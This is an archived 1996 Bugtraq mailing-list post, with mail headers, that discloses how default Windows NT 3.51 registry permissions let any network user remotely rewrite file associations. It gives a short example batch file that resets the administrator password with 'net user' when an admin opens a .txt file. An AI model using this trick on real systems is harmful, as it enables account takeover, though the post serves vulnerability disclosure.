From proff Sun Sep 29 10:28:45 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA17046 for best-of-security; Sun, 29 Sep 1996 10:28:44 +1000 Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id JAA14344; Sun, 29 Sep 1996 09:10:16 +1000 Received: from brimstone.netspace.org(128.148.157.143) via SMTP by suburbia.net, id smtpd14337aaa; Sun Sep 29 09:10:07 1996 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23431-30126>; Sat, 28 Sep 1996 19:08:57 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA01727; Sat, 28 Sep 1996 19:02:17 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 596170 for BUGTRAQ@NETSPACE.ORG; Sat, 28 Sep 1996 18:07:42 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id SAA30511 for ; Sat, 28 Sep 1996 18:07:19 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from lux.levels.unisa.edu.au (lux.levels.unisa.edu.au [130.220.16.65]) by netspace.org (8.7/8.6.12) with SMTP id AAA16718 for ; Sat, 28 Sep 1996 00:35:13 -0400 Received: from (itudps@localhost) by lux.levels.unisa.edu.au (SMI-8.6/SMI-SVR4) id OAA10795; Sat, 28 Sep 1996 14:05:29 +0930 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: Dan Shearer Message-ID: Date: Sat, 28 Sep 1996 14:05:28 +0930 Reply-To: Dan Shearer Sender: Bugtraq List From: Dan Shearer Subject: Re: NT security et al (Dangers of NetBIOS/NBT?) To: Multiple recipients of list BUGTRAQ In-Reply-To: <199609271918.PAA09183@gateway.esisys.com> Approved: proff@suburbia.net On Fri, 27 Sep 1996, Jacob Langseth wrote: > here's some more: > ppl can read portions of the registry remotely (via regedt32.exe). By default they can _write_ to it too, at least under 3.51 the default permissions gave Everyone write access to quite a few things. The canonical example was (is) the key that determines the association between an application and its extension in file manager. That can be changed by an unpriveliged, even unknown user with access to regedt32 on a connected network. Should the .txt entry be changed to point to: \\SomeNTorUnixWorkstation\UnprotectedShare\bogus.cmd where bogus.cmd contains: net user administrator xxxxx /y notepad %1 %2 %2 %3 %4 %5 all somone with admin privelige at the console has to do is double-click on a text file and the admin password is changed. Of course this is a pretty basic example because the admin would (hopefully) be suspicious on seeing a dos box pop up. But it is trivial to write a win32 app that both launches notepad and does some malicious trapdoor stuff with the admin privelige it has been given. -- Dan Shearer email: Dan.Shearer@UniSA.edu.au Information Technology Unit Phone: +61 8 302 3479 University of South Australia Fax : +61 8 302 3385